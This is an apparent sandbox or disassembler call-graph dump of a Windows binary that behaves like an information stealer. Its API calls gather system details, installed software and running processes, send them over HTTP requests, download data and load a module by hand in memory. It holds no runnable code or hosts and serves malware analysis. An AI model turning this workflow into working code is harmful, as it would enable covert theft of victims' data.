lstrcpy 59546->59547 59553 405708 59547->59553 59549 405caa 59548->59549 59551 416fb0 4 API calls 59549->59551 59554 416da0 lstrcpy 59550->59554 59552 405cc0 59551->59552 59555 416ea0 lstrcpy 59552->59555 59556 416fb0 4 API calls 59553->59556 59564 405cfc 59554->59564 59555->59550 59557 405732 59556->59557 59558 416ea0 lstrcpy 59557->59558 59559 40573b 59558->59559 59560 416fb0 4 API calls 59559->59560 59561 40575a 59560->59561 59562 416ea0 lstrcpy 59561->59562 59563 405763 59562->59563 59565 416f20 3 API calls 59563->59565 59564->58555 59566 405781 59565->59566 59567 416ea0 lstrcpy 59566->59567 59568 40578a 59567->59568 59569 416fb0 4 API calls 59568->59569 59570 4057a9 59569->59570 59571 416ea0 lstrcpy 59570->59571 59572 4057b2 59571->59572 59573 416fb0 4 API calls 59572->59573 59574 4057d1 59573->59574 59575 416ea0 lstrcpy 59574->59575 59576 4057da 59575->59576 59577 416fb0 4 API calls 59576->59577 59578 405806 59577->59578 59579 416f20 3 API calls 59578->59579 59580 40580d 59579->59580 59581 416ea0 lstrcpy 59580->59581 59582 405816 59581->59582 59583 40582c InternetConnectA 59582->59583 59583->59539 59584 40585c HttpOpenRequestA 59583->59584 59586 405c63 InternetCloseHandle 59584->59586 59587 4058bb 59584->59587 59586->59539 59588 416fb0 4 API calls 59587->59588 59589 4058cf 59588->59589 59590 416ea0 lstrcpy 59589->59590 59591 4058d8 59590->59591 59592 416f20 3 API calls 59591->59592 59593 4058f6 59592->59593 59594 416ea0 lstrcpy 59593->59594 59595 4058ff 59594->59595 59596 416fb0 4 API calls 59595->59596 59597 40591e 59596->59597 59598 416ea0 lstrcpy 59597->59598 59599 405927 59598->59599 59600 416fb0 4 API calls 59599->59600 59601 405948 59600->59601 59602 416ea0 lstrcpy 59601->59602 59603 405951 59602->59603 59604 416fb0 4 API calls 59603->59604 59605 405971 59604->59605 59606 416ea0 lstrcpy 59605->59606 59607 40597a 59606->59607 59608 416fb0 4 API calls 59607->59608 59609 405999 59608->59609 59610 416ea0 lstrcpy 59609->59610 59611 4059a2 59610->59611 59612 416f20 3 API calls 59611->59612 59613 4059c0 59612->59613 59614 416ea0 lstrcpy 59613->59614 59615 4059c9 59614->59615 59616 416fb0 4 API calls 59615->59616 59617 4059e8 59616->59617 59618 416ea0 lstrcpy 59617->59618 59619 4059f1 59618->59619 59620 416fb0 4 API calls 59619->59620 59621 405a10 59620->59621 59622 416ea0 lstrcpy 59621->59622 59623 405a19 59622->59623 59624 416f20 3 API calls 59623->59624 59625 405a37 59624->59625 59626 416ea0 lstrcpy 59625->59626 59627 405a40 59626->59627 59628 416fb0 4 API calls 59627->59628 59629 405a5f 59628->59629 59630 416ea0 lstrcpy 59629->59630 59631 405a68 59630->59631 59632 416fb0 4 API calls 59631->59632 59633 405a89 59632->59633 59634 416ea0 lstrcpy 59633->59634 59635 405a92 59634->59635 59636 416fb0 4 API calls 59635->59636 59637 405ab2 59636->59637 59638 416ea0 lstrcpy 59637->59638 59639 405abb 59638->59639 59640 416fb0 4 API calls 59639->59640 59641 405ada 59640->59641 59642 416ea0 lstrcpy 59641->59642 59643 405ae3 59642->59643 59644 416f20 3 API calls 59643->59644 59645 405b01 59644->59645 59646 416ea0 lstrcpy 59645->59646 59647 405b0a 59646->59647 59648 405b1d lstrlen 59647->59648 60408 4170d0 59648->60408 59650 405b2e lstrlen GetProcessHeap HeapAlloc 60409 4170d0 59650->60409 59652 405b5b lstrlen 60410 4170d0 59652->60410 59654 405b6b memcpy 60411 4170d0 59654->60411 59656 405b84 lstrlen 59657 405b94 59656->59657 59658 405b9d lstrlen memcpy 59657->59658 60412 4170d0 59658->60412 59660 405bc7 lstrlen 60413 4170d0 59660->60413 59662 405bd7 HttpSendRequestA 59663 405be2 InternetReadFile 59662->59663 59664 405c17 InternetCloseHandle 59663->59664 59668 405c0e 59663->59668 59664->59586 59666 416fb0 4 API calls 59666->59668 59667 416ea0 lstrcpy 59667->59668 59668->59663 59668->59664 59668->59666 59668->59667 60414 4170d0 59669->60414 59671 40f3d7 strtok_s 59674 40f3e4 59671->59674 59672 40f4b1 59672->58557 59673 40f48d strtok_s 59673->59674 59674->59672 59674->59673 59675 416e20 lstrlen lstrcpy 59674->59675 59675->59674 60415 4170d0 59676->60415 59678 40f227 strtok_s 59685 40f234 59678->59685 59679 40f363 strtok_s 59679->59685 59680 40f387 59680->58565 59681 40f314 StrCmpCA 59681->59685 59682 40f297 StrCmpCA 59682->59685 59683 40f2d7 StrCmpCA 59683->59685 59684 416e20 lstrlen lstrcpy 59684->59685 59685->59679 59685->59680 59685->59681 59685->59682 59685->59683 59685->59684 59687 416d40 lstrcpy 59686->59687 59688 40fd26 59687->59688 59689 416fb0 4 API calls 59688->59689 59690 40fd37 59689->59690 59691 416ea0 lstrcpy 59690->59691 59692 40fd40 59691->59692 59693 416fb0 4 API calls 59692->59693 59694 40fd5b 59693->59694 59695 416ea0 lstrcpy 59694->59695 59696 40fd64 59695->59696 59697 416fb0 4 API calls 59696->59697 59698 40fd7d 59697->59698 59699 416ea0 lstrcpy 59698->59699 59700 40fd86 59699->59700 59701 416fb0 4 API calls 59700->59701 59702 40fda1 59701->59702 59703 416ea0 lstrcpy 59702->59703 59704 40fdaa 59703->59704 59705 416fb0 4 API calls 59704->59705 59706 40fdc3 59705->59706 59707 416ea0 lstrcpy 59706->59707 59708 40fdcc 59707->59708 59709 416fb0 4 API calls 59708->59709 59710 40fde7 59709->59710 59711 416ea0 lstrcpy 59710->59711 59712 40fdf0 59711->59712 59713 416fb0 4 API calls 59712->59713 59714 40fe09 59713->59714 59715 416ea0 lstrcpy 59714->59715 59716 40fe12 59715->59716 59717 416fb0 4 API calls 59716->59717 59718 40fe2d 59717->59718 59719 416ea0 lstrcpy 59718->59719 59720 40fe36 59719->59720 59721 416fb0 4 API calls 59720->59721 59722 40fe4f 59721->59722 59723 416ea0 lstrcpy 59722->59723 59724 40fe58 59723->59724 59725 416fb0 4 API calls 59724->59725 59726 40fe76 59725->59726 59727 416ea0 lstrcpy 59726->59727 59728 40fe7f 59727->59728 59729 4141c0 6 API calls 59728->59729 59730 40fe96 59729->59730 59731 416f20 3 API calls 59730->59731 59732 40fea9 59731->59732 59733 416ea0 lstrcpy 59732->59733 59734 40feb2 59733->59734 59735 416fb0 4 API calls 59734->59735 59736 40fedc 59735->59736 59737 416ea0 lstrcpy 59736->59737 59738 40fee5 59737->59738 59739 416fb0 4 API calls 59738->59739 59740 40ff05 59739->59740 59741 416ea0 lstrcpy 59740->59741 59742 40ff0e 59741->59742 60416 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 59742->60416 59744 40ff1e 59745 416fb0 4 API calls 59744->59745 59746 40ff2e 59745->59746 59747 416ea0 lstrcpy 59746->59747 59748 40ff37 59747->59748 59749 416fb0 4 API calls 59748->59749 59750 40ff56 59749->59750 59751 416ea0 lstrcpy 59750->59751 59752 40ff5f 59751->59752 59753 416fb0 4 API calls 59752->59753 59754 40ff80 59753->59754 59755 416ea0 lstrcpy 59754->59755 59756 40ff89 59755->59756 60419 414380 GetCurrentProcess IsWow64Process 59756->60419 59759 416fb0 4 API calls 59760 40ffa9 59759->59760 59761 416ea0 lstrcpy 59760->59761 59762 40ffb2 59761->59762 59763 416fb0 4 API calls 59762->59763 59764 40ffd1 59763->59764 59765 416ea0 lstrcpy 59764->59765 59766 40ffda 59765->59766 59767 416fb0 4 API calls 59766->59767 59768 40fffb 59767->59768 59769 416ea0 lstrcpy 59768->59769 59770 410004 59769->59770 60421 4143c0 GetProcessHeap HeapAlloc GetUserNameA 59770->60421 59772 410014 59773 416fb0 4 API calls 59772->59773 59774 410024 59773->59774 59775 416ea0 lstrcpy 59774->59775 59776 41002d 59775->59776 59777 416fb0 4 API calls 59776->59777 59778 41004c 59777->59778 59779 416ea0 lstrcpy 59778->59779 59780 410055 59779->59780 59781 416fb0 4 API calls 59780->59781 59782 410075 59781->59782 59783 416ea0 lstrcpy 59782->59783 59784 41007e 59783->59784 59785 414400 3 API calls 59784->59785 59786 41008e 59785->59786 59787 416fb0 4 API calls 59786->59787 59788 41009e 59787->59788 59789 416ea0 lstrcpy 59788->59789 59790 4100a7 59789->59790 59791 416fb0 4 API calls 59790->59791 59792 4100c6 59791->59792 59793 416ea0 lstrcpy 59792->59793 59794 4100cf 59793->59794 59795 416fb0 4 API calls 59794->59795 59796 4100f0 59795->59796 59797 416ea0 lstrcpy 59796->59797 59798 4100f9 59797->59798 60422 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 59798->60422 59800 410109 59801 416fb0 4 API calls 59800->59801 59802 410119 59801->59802 59803 416ea0 lstrcpy 59802->59803 59804 410122 59803->59804 59805 416fb0 4 API calls 59804->59805 59806 410141 59805->59806 59807 416ea0 lstrcpy 59806->59807 59808 41014a 59807->59808 59809 416fb0 4 API calls 59808->59809 59810 41016b 59809->59810 59811 416ea0 lstrcpy 59810->59811 59812 410174 59811->59812 60423 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 59812->60423 59815 416fb0 4 API calls 59816 410194 59815->59816 59817 416ea0 lstrcpy 59816->59817 59818 41019d 59817->59818 59819 416fb0 4 API calls 59818->59819 59820 4101bc 59819->59820 59821 416ea0 lstrcpy 59820->59821 59822 4101c5 59821->59822 59823 416fb0 4 API calls 59822->59823 59824 4101e5 59823->59824 59825 416ea0 lstrcpy 59824->59825 59826 4101ee 59825->59826 60426 414530 GetUserDefaultLocaleName 59826->60426 59829 416fb0 4 API calls 59830 41020e 59829->59830 59831 416ea0 lstrcpy 59830->59831 59832 410217 59831->59832 59833 416fb0 4 API calls 59832->59833 59834 410236 59833->59834 59835 416ea0 lstrcpy 59834->59835 59836 41023f 59835->59836 59837 416fb0 4 API calls 59836->59837 59838 410260 59837->59838 59839 416ea0 lstrcpy 59838->59839 59840 410269 59839->59840 60431 414570 59840->60431 59842 410280 59843 416f20 3 API calls 59842->59843 59844 410293 59843->59844 59845 416ea0 lstrcpy 59844->59845 59846 41029c 59845->59846 59847 416fb0 4 API calls 59846->59847 59848 4102c6 59847->59848 59849 416ea0 lstrcpy 59848->59849 59850 4102cf 59849->59850 59851 416fb0 4 API calls 59850->59851 59852 4102ef 59851->59852 59853 416ea0 lstrcpy 59852->59853 59854 4102f8 59853->59854 60443 414710 GetSystemPowerStatus 59854->60443 59857 416fb0 4 API calls 59858 410318 59857->59858 59859 416ea0 lstrcpy 59858->59859 59860 410321 59859->59860 59861 416fb0 4 API calls 59860->59861 59862 410340 59861->59862 59863 416ea0 lstrcpy 59862->59863 59864 410349 59863->59864 59865 416fb0 4 API calls 59864->59865 59866 41036a 59865->59866 59867 416ea0 lstrcpy 59866->59867 59868 410373 59867->59868 59869 41037e GetCurrentProcessId 59868->59869 60445 415b70 OpenProcess 59869->60445 59872 416f20 3 API calls 59873 4103a4 59872->59873 59874 416ea0 lstrcpy 59873->59874 59875 4103ad 59874->59875 59876 416fb0 4 API calls 59875->59876 59877 4103d7 59876->59877 59878 416ea0 lstrcpy 59877->59878 59879 4103e0 59878->59879 59880 416fb0 4 API calls 59879->59880 59881 410400 59880->59881 59882 416ea0 lstrcpy 59881->59882 59883 410409 59882->59883 60450 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 59883->60450 59885 410419 59886 416fb0 4 API calls 59885->59886 59887 410429 59886->59887 59888 416ea0 lstrcpy 59887->59888 59889 410432 59888->59889 59890 416fb0 4 API calls 59889->59890 59891 410451 59890->59891 59892 416ea0 lstrcpy 59891->59892 59893 41045a 59892->59893 59894 416fb0 4 API calls 59893->59894 59895 41047b 59894->59895 59896 416ea0 lstrcpy 59895->59896 59897 410484 59896->59897 60453 414800 59897->60453 59900 416fb0 4 API calls 59901 4104a4 59900->59901 59902 416ea0 lstrcpy 59901->59902 59903 4104ad 59902->59903 59904 416fb0 4 API calls 59903->59904 59905 4104cc 59904->59905 59906 416ea0 lstrcpy 59905->59906 59907 4104d5 59906->59907 59908 416fb0 4 API calls 59907->59908 59909 4104f6 59908->59909 59910 416ea0 lstrcpy 59909->59910 59911 4104ff 59910->59911 60468 4147c0 GetSystemInfo wsprintfA 59911->60468 59913 41050f 59914 416fb0 4 API calls 59913->59914 59915 41051f 59914->59915 59916 416ea0 lstrcpy 59915->59916 59917 410528 59916->59917 59918 416fb0 4 API calls 59917->59918 59919 410547 59918->59919 59920 416ea0 lstrcpy 59919->59920 59921 410550 59920->59921 59922 416fb0 4 API calls 59921->59922 59923 410570 59922->59923 59924 416ea0 lstrcpy 59923->59924 59925 410579 59924->59925 60469 414960 GetProcessHeap HeapAlloc 59925->60469 59927 410589 59928 416fb0 4 API calls 59927->59928 59929 410599 59928->59929 59930 416ea0 lstrcpy 59929->59930 59931 4105a2 59930->59931 59932 416fb0 4 API calls 59931->59932 59933 4105c1 59932->59933 59934 416ea0 lstrcpy 59933->59934 59935 4105ca 59934->59935 59936 416fb0 4 API calls 59935->59936 59937 4105eb 59936->59937 59938 416ea0 lstrcpy 59937->59938 59939 4105f4 59938->59939 60474 414ed0 59939->60474 59942 416f20 3 API calls 59943 41061e 59942->59943 59944 416ea0 lstrcpy 59943->59944 59945 410627 59944->59945 59946 416fb0 4 API calls 59945->59946 59947 410651 59946->59947 59948 416ea0 lstrcpy 59947->59948 59949 41065a 59948->59949 59950 416fb0 4 API calls 59949->59950 59951 41067a 59950->59951 59952 416ea0 lstrcpy 59951->59952 59953 410683 59952->59953 59954 416fb0 4 API calls 59953->59954 59955 4106a2 59954->59955 59956 416ea0 lstrcpy 59955->59956 59957 4106ab 59956->59957 60479 414a00 59957->60479 59959 4106c2 59960 416f20 3 API calls 59959->59960 59961 4106d5 59960->59961 59962 416ea0 lstrcpy 59961->59962 59963 4106de 59962->59963 59964 416fb0 4 API calls 59963->59964 59965 41070a 59964->59965 59966 416ea0 lstrcpy 59965->59966 59967 410713 59966->59967 59968 416fb0 4 API calls 59967->59968 59969 410732 59968->59969 59970 416ea0 lstrcpy 59969->59970 59971 41073b 59970->59971 59972 416fb0 4 API calls 59971->59972 59973 41075c 59972->59973 59974 416ea0 lstrcpy 59973->59974 59975 410765 59974->59975 59976 416fb0 4 API calls 59975->59976 59977 410784 59976->59977 59978 416ea0 lstrcpy 59977->59978 59979 41078d 59978->59979 59980 416fb0 4 API calls 59979->59980 59981 4107ae 59980->59981 59982 416ea0 lstrcpy 59981->59982 59983 4107b7 59982->59983 60487 414ae0 59983->60487 59985 4107d3 59986 416f20 3 API calls 59985->59986 59987 4107e6 59986->59987 59988 416ea0 lstrcpy 59987->59988 59989 4107ef 59988->59989 59990 416fb0 4 API calls 59989->59990 59991 410819 59990->59991 59992 416ea0 lstrcpy 59991->59992 59993 410822 59992->59993 59994 416fb0 4 API calls 59993->59994 59995 410843 59994->59995 59996 416ea0 lstrcpy 59995->59996 59997 41084c 59996->59997 59998 414ae0 17 API calls 59997->59998 59999 410868 59998->59999 60000 416f20 3 API calls 59999->60000 60001 41087b 60000->60001 60002 416ea0 lstrcpy 60001->60002 60003 410884 60002->60003 60004 416fb0 4 API calls 60003->60004 60005 4108ae 60004->60005 60006 416ea0 lstrcpy 60005->60006 60007 4108b7 60006->60007 60008 416fb0 4 API calls 60007->60008 60009 4108d6 60008->60009 60010 416ea0 lstrcpy 60009->60010 60011 4108df 60010->60011 60012 416fb0 4 API calls 60011->60012 60013 410900 60012->60013 60014 416ea0 lstrcpy 60013->60014 60015 410909 60014->60015 60523 414de0 60015->60523 60017 410920 60018 416f20 3 API calls 60017->60018 60019 410933 60018->60019 60020 416ea0 lstrcpy 60019->60020 60021 41093c 60020->60021 60022 41095a lstrlen 60021->60022 60023 41096a 60022->60023 60024 416d40 lstrcpy 60023->60024 60025 41097c 60024->60025 60026 401500 lstrcpy 60025->60026 60027 41098a 60026->60027 60533 404dc0 60027->60533 60029 410996 60029->58569 60713 4170d0 60030->60713 60032 404cc9 InternetOpenUrlA 60033 404ce1 60032->60033 60034 404cea InternetReadFile 60033->60034 60035 404d5c InternetCloseHandle InternetCloseHandle 60033->60035 60034->60033 60036 404da8 60035->60036 60036->58573 60714 4092b0 60037->60714 60039 40ef93 60040 40efb4 60039->60040 60041 40f1cf 60039->60041 60044 40efcd StrCmpCA 60040->60044 60042 401500 lstrcpy 60041->60042 60043 40f1dd 60042->60043 60878 40ea90 60043->60878 60046 40efd8 60044->60046 60072 40f04f 60044->60072 60047 416da0 lstrcpy 60046->60047 60049 40eff0 60047->60049 60048 40f06e StrCmpCA 60050 40f07d 60048->60050 60053 40f14e 60048->60053 60052 401500 lstrcpy 60049->60052 60054 416d40 lstrcpy 60050->60054 60055 40f01e 60052->60055 60056 40f17d StrCmpCA 60053->60056 60057 40f08a 60054->60057 60058 416da0 lstrcpy 60055->60058 60059 40f188 60056->60059 60060 40f1c7 60056->60060 60061 416fb0 4 API calls 60057->60061 60062 40f032 60058->60062 60064 401500 lstrcpy 60059->60064 60060->58577 60065 40f0b2 60061->60065 60063 416da0 lstrcpy 60062->60063 60066 40f04a 60063->60066 60067 40f196 60064->60067 60068 416f20 3 API calls 60065->60068 60717 40e420 60066->60717 60070 416da0 lstrcpy 60067->60070 60071 40f0b9 60068->60071 60073 40f1aa 60070->60073 60074 416fb0 4 API calls 60071->60074 60072->60048 60372 404486 60371->60372 60403 414ff0 malloc 60372->60403 60374 4044af 60404 414ff0 malloc 60374->60404 60376 4044c5 60405 414ff0 malloc 60376->60405 60378 4044db 60379 4044f5 lstrlen 60378->60379 60406 4170d0 60379->60406 60381 404505 InternetCrackUrlA 60382 404524 60381->60382 60382->59355 60384 416d40 lstrcpy 60383->60384 60385 415274 60384->60385 60386 416d40 lstrcpy 60385->60386 60387 415282 GetSystemTime 60386->60387 60388 415299 60387->60388 60389 416da0 lstrcpy 60388->60389 60390 4152fc 60389->60390 60390->59370 60392 416f31 60391->60392 60393 416f88 60392->60393 60395 416f68 lstrcpy lstrcat 60392->60395 60394 416da0 lstrcpy 60393->60394 60396 416f94 60394->60396 60395->60393 60396->59374 60397->59488 60399 4094d9 LocalAlloc 60398->60399 60400 404bae 60398->60400 60399->60400 60401 4094f4 CryptStringToBinaryA 60399->60401 60400->59376 60400->59379 60401->60400 60402 409519 LocalFree 60401->60402 60402->60400 60403->60374 60404->60376 60405->60378 60406->60381 60407->59498 60408->59650 60409->59652 60410->59654 60411->59656 60412->59660 60413->59662 60414->59671 60415->59678 60417 414362 RegCloseKey 60416->60417 60418 414345 RegQueryValueExA 60416->60418 60417->59744 60418->60417 60420 40ff99 60419->60420 60420->59759 60421->59772 60422->59800 60424 4144f7 wsprintfA 60423->60424 60425 410184 60423->60425 60424->60425 60425->59815 60427 4101fe 60426->60427 60428 41455a 60426->60428 60427->59829 60695 415420 LocalAlloc CharToOemW 60428->60695 60430 414566 60430->60427 60432 416d40 lstrcpy 60431->60432 60433 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 60432->60433 60442 4145e2 60433->60442 60434 414603 GetLocaleInfoA 60434->60442 60435 4146d5 60436 4146e5 60435->60436 60437 4146db LocalFree 60435->60437 60438 416da0 lstrcpy 60436->60438 60437->60436 60439 4146f4 60438->60439 60439->59842 60440 416fb0 lstrcpy lstrlen lstrcpy lstrcat 60440->60442 60441 416ea0 lstrcpy 60441->60442 60442->60434 60442->60435 60442->60440 60442->60441 60444 410308 60443->60444 60444->59857 60446 415b93 K32GetModuleFileNameExA CloseHandle 60445->60446 60447 415bb5 60445->60447 60446->60447 60448 416d40 lstrcpy 60447->60448 60449 410391 60448->60449 60449->59872 60451 4147a2 RegCloseKey 60450->60451 60452 414785 RegQueryValueExA 60450->60452 60451->59885 60452->60451 60454 414836 GetLogicalProcessorInformationEx 60453->60454 60455 414855 GetLastError 60454->60455 60460 4148ab 60454->60460 60456 414860 60455->60456 60457 41489f 60455->60457 60466 414869 60456->60466 60463 410494 60457->60463 60699 4150f0 GetProcessHeap HeapFree 60457->60699 60698 4150f0 GetProcessHeap HeapFree 60460->60698 60463->59900 60464 4148fd 60464->60463 60467 414906 wsprintfA 60464->60467 60465 414893 60465->60463 60466->60454 60466->60465 60696 4150f0 GetProcessHeap HeapFree 60466->60696 60697 415110 GetProcessHeap HeapAlloc 60466->60697 60467->60463 60468->59913 60470 415090 60469->60470 60471 41498a GlobalMemoryStatusEx 60470->60471 60473 4149a0 __aulldiv 60471->60473 60472 4149d8 wsprintfA 60472->59927 60473->60472 60475 414ee8 GetProcessHeap HeapAlloc wsprintfA 60474->60475 60477 416d40 lstrcpy 60475->60477 60478 41060b 60477->60478 60478->59942 60480 416d40 lstrcpy 60479->60480 60485 414a16 60480->60485 60481 414a50 60483 416da0 lstrcpy 60481->60483 60482 416fb0 lstrcpy lstrlen lstrcpy lstrcat 60482->60485 60484 414ac9 60483->60484 60484->59959 60485->60481 60485->60482 60486 416ea0 lstrcpy 60485->60486 60486->60485 60488 416d40 lstrcpy 60487->60488 60489 414af9 RegOpenKeyExA 60488->60489 60490 414b4b 60489->60490 60491 414b6d 60489->60491 60492 416da0 lstrcpy 60490->60492 60493 414db0 RegCloseKey 60491->60493 60494 414b95 RegEnumKeyExA 60491->60494 60503 414b5a 60492->60503 60497 416da0 lstrcpy 60493->60497 60495 414dab 60494->60495 60496 414bdc wsprintfA RegOpenKeyExA 60494->60496 60495->60493 60498 414c22 RegCloseKey RegCloseKey 60496->60498 60499 414c5e RegQueryValueExA 60496->60499 60497->60503 60500 416da0 lstrcpy 60498->60500 60501 414c97 lstrlen 60499->60501 60502 414d9e RegCloseKey 60499->60502 60500->60503 60501->60502 60504 414cad 60501->60504 60502->60495 60503->59985 60505 416fb0 4 API calls 60504->60505 60506 414cc4 60505->60506 60507 416ea0 lstrcpy 60506->60507 60508 414cd0 60507->60508 60509 416fb0 4 API calls 60508->60509 60510 414cf4 60509->60510 60511 416ea0 lstrcpy 60510->60511 60512 414d00 60511->60512 60513 414d0b RegQueryValueExA 60512->60513 60513->60502 60514 414d40 60513->60514 60515 416fb0 4 API calls 60514->60515 60516 414d57 60515->60516 60517 416ea0 lstrcpy 60516->60517 60518 414d63 60517->60518 60519 416fb0 4 API calls 60518->60519 60520 414d87 60519->60520 60521 416ea0 lstrcpy 60520->60521 60522 414d93 60521->60522 60522->60502 60524 416d40 lstrcpy 60523->60524 60525 414df9 CreateToolhelp32Snapshot Process32First 60524->60525 60526 414e25 Process32Next 60525->60526 60527 414e9a FindCloseChangeNotification 60525->60527 60526->60527 60532 414e3a 60526->60532 60528 416da0 lstrcpy 60527->60528 60529 414eb3 60528->60529 60529->60017 60530 416ea0 lstrcpy 60530->60532 60531 416fb0 lstrcpy lstrlen lstrcpy lstrcat 60531->60532 60532->60526 60532->60530 60532->60531 60534 416da0 lstrcpy 60533->60534 60535 404dd9 60534->60535 60536 404470 3 API calls 60535->60536 60537 404de5 60536->60537 60700 4155a0 60537->60700 60539 404e3e 60540 404e49 lstrlen 60539->60540 60541 404e59 60540->60541 60542 4155a0 4 API calls 60541->60542 60543 404e6a 60542->60543 60544 416d40 lstrcpy 60543->60544 60545 404e7d 60544->60545 60546 416d40 lstrcpy 60545->60546 60547 404e8a 60546->60547 60548 416d40 lstrcpy 60547->60548 60549 404e97 60548->60549 60550 416d40 lstrcpy 60549->60550 60551 404ea4 60550->60551 60552 416d40 lstrcpy 60551->60552 60553 404eb1 InternetOpenA StrCmpCA 60552->60553 60554 404ee3 60553->60554 60555 405578 InternetCloseHandle 60554->60555 60556 415260 3 API calls 60554->60556 60562 40558d moneypunct 60555->60562 60557 404f02 60556->60557 60558 416f20 3 API calls 60557->60558 60559 404f15 60558->60559 60560 416ea0 lstrcpy 60559->60560 60561 404f1e 60560->60561 60563 416fb0 4 API calls 60561->60563 60565 416da0 lstrcpy 60562->60565 60564 404f5f 60563->60564 60566 416f20 3 API calls 60564->60566 60573 4055c7 60565->60573 60567 404f66 60566->60567 60568 416fb0 4 API calls 60567->60568 60569 404f6d 60568->60569 60570 416ea0 lstrcpy 60569->60570 60571 404f76 60570->60571 60572 416fb0 4 API calls 60571->60572 60574 404fb7 60572->60574 60573->60029 60575 416f20 3 API calls 60574->60575 60576 404fbe 60575->60576 60577 416ea0 lstrcpy 60576->60577 60578 404fc7 60577->60578 60579 404fdd InternetConnectA 60578->60579 60579->60555 60580 40500d HttpOpenRequestA 60579->60580 60582 40556b InternetCloseHandle 60580->60582 60583 40506b 60580->60583 60582->60555 60584 416fb0 4 API calls 60583->60584 60585 40507f 60584->60585 60586 416ea0 lstrcpy 60585->60586 60587 405088 60586->60587 60588 416f20 3 API calls 60587->60588 60589 4050a6 60588->60589 60590 416ea0 lstrcpy 60589->60590 60591 4050af 60590->60591 60592 416fb0 4 API calls 60591->60592 60593 4050ce 60592->60593 60594 416ea0 lstrcpy 60593->60594 60595 4050d7 60594->60595 60596 416fb0 4 API calls 60595->60596 60597 4050f8 60596->60597 60598 416ea0 lstrcpy 60597->60598 60599 405101 60598->60599 60600 416fb0 4 API calls 60599->60600 60695->60430 60696->60466 60697->60466 60698->60464 60699->60463 60701 4155ad CryptBinaryToStringA 60700->60701 60702 4155a9 60700->60702 60701->60702 60703 4155ce GetProcessHeap RtlAllocateHeap 60701->60703 60702->60539 60703->60702 60704 4155f4 moneypunct 60703->60704 60705 415605 CryptBinaryToStringA 60704->60705 60705->60702 60713->60032 60953 409260 60714->60953 60716 4092c1 60716->60039 60879 416d40 lstrcpy 60878->60879 60880 40eaa6 60879->60880 60881 4154e0 2 API calls 60880->60881 60882 40eabb 60881->60882 60883 416f20 3 API calls 60882->60883 60884 40eacb 60883->60884 60885 416ea0 lstrcpy 60884->60885 60886 40ead4 60885->60886 60958 414ff0 malloc 60953->60958 60955 40926d 60959 406990 60955->60959 60957 40928c moneypunct 60957->60716 60958->60955 60962 406730 60959->60962 60963 406753 60962->60963 60979 406749 60962->60979 60980 405f20 60963->60980 60967 4067ae 60967->60979 60992 4063a0 60967->60992 60971 40683a 60972 4068d6 VirtualFree 60971->60972 60974 4068e7 60971->60974 60971->60979 60972->60974 60979->60957 60982 405f32 60980->60982 60981 405f39 60981->60979 60986 406050 60981->60986 60982->60981 60983 405fbe 60982->60983 61009 415110 GetProcessHeap HeapAlloc 60983->61009 60985 405fe0 60985->60981 60989 40607f VirtualAlloc 60986->60989 60988 406120 60990 406133 VirtualAlloc 60988->60990 60991 40612c 60988->60991 60989->60988 60989->60991 60990->60991 60991->60967 60993 4063c5 60992->60993 60994 4063b9 60992->60994 60993->60979 61003 4065d0 60993->61003 60994->60993 60995 4063f9 LoadLibraryA 60994->60995 60996 406418 60995->60996 60997 406422 60995->60997 60996->60993 61000 4064cc 60997->61000 61010 415110 GetProcessHeap HeapAlloc 60997->61010 60999 406594 GetProcAddress 60999->60996 60999->61000 61000->60996 61000->60999 61001 40647b 61001->60996 61011 4150f0 GetProcessHeap HeapFree 61001->61011 61005 4065eb 61003->61005 61004 406699 61004->60971 61005->61004 61006 406670 VirtualProtect 61005->61006 61006->61004 61006->61005 61009->60985 61010->61001 61011->61000 62031 6c77b694 62032 6c77b6a0 ___scrt_is_nonwritable_in_current_image 62031->62032 62061 6c77af2a 62032->62061 62034 6c77b6a7 62035 6c77b796 62034->62035 62036 6c77b6d1 62034->62036 62044 6c77b6ac ___scrt_is_nonwritable_in_current_image 62034->62044 62078 6c77b1f7 IsProcessorFeaturePresent 62035->62078 62065 6c77b064 62036->62065 62039 6c77b6e0 __RTC_Initialize 62039->62044 62068 6c77bf89 InitializeSListHead 62039->62068 62040 6c77b7b3 ___scrt_uninitialize_crt __RTC_Initialize 62042 6c77b6ee ___scrt_initialize_default_local_stdio_options 62045 6c77b6f3 _initterm_e 62042->62045 62043 6c77b79d ___scrt_is_nonwritable_in_current_image 62043->62040 62046 6c77b7d2 62043->62046 62047 6c77b828 62043->62047 62045->62044 62049 6c77b708 62045->62049 62082 6c77b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 62046->62082 62048 6c77b1f7 ___scrt_fastfail 6 API calls 62047->62048 62051 6c77b82f 62048->62051 62069 6c77b072 62049->62069 62057 6c77b86e dllmain_crt_process_detach 62051->62057 62058 6c77b83b 62051->62058 62053 6c77b7d7 62083 6c77bf95 __std_type_info_destroy_list 62053->62083 62054 6c77b70d 62054->62044 62056 6c77b711 _initterm 62054->62056 62056->62044 62060 6c77b840 62057->62060 62059 6c77b860 dllmain_crt_process_attach 62058->62059 62058->62060 62059->62060 62062 6c77af33 62061->62062 62084 6c77b341 IsProcessorFeaturePresent 62062->62084 62064 6c77af3f ___scrt_uninitialize_crt 62064->62034 62085 6c77af8b 62065->62085 62067 6c77b06b 62067->62039 62068->62042 62070 6c77b077 ___scrt_release_startup_lock 62069->62070 62071 6c77b07b 62070->62071 62073 6c77b082 62070->62073 62095 6c77b341 IsProcessorFeaturePresent 62071->62095 62075 6c77b087 _configure_narrow_argv 62073->62075 62074 6c77b080 62074->62054 62076 6c77b095 _initialize_narrow_environment 62075->62076 62077 6c77b092 62075->62077 62076->62074 62077->62054 62079 6c77b20c ___scrt_fastfail 62078->62079 62080 6c77b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 62079->62080 62081 6c77b302 ___scrt_fastfail 62080->62081 62081->62043 62082->62053 62083->62040 62084->62064 62086 6c77af9e 62085->62086 62087 6c77af9a 62085->62087 62088 6c77b028 62086->62088 62091 6c77afab ___scrt_release_startup_lock 62086->62091 62087->62067 62089 6c77b1f7 ___scrt_fastfail 6 API calls 62088->62089 62090 6c77b02f 62089->62090 62092 6c77afb8 _initialize_onexit_table 62091->62092 62094 6c77afd6 62091->62094 62093 6c77afc7 _initialize_onexit_table 62092->62093 62092->62094 62093->62094 62094->62067 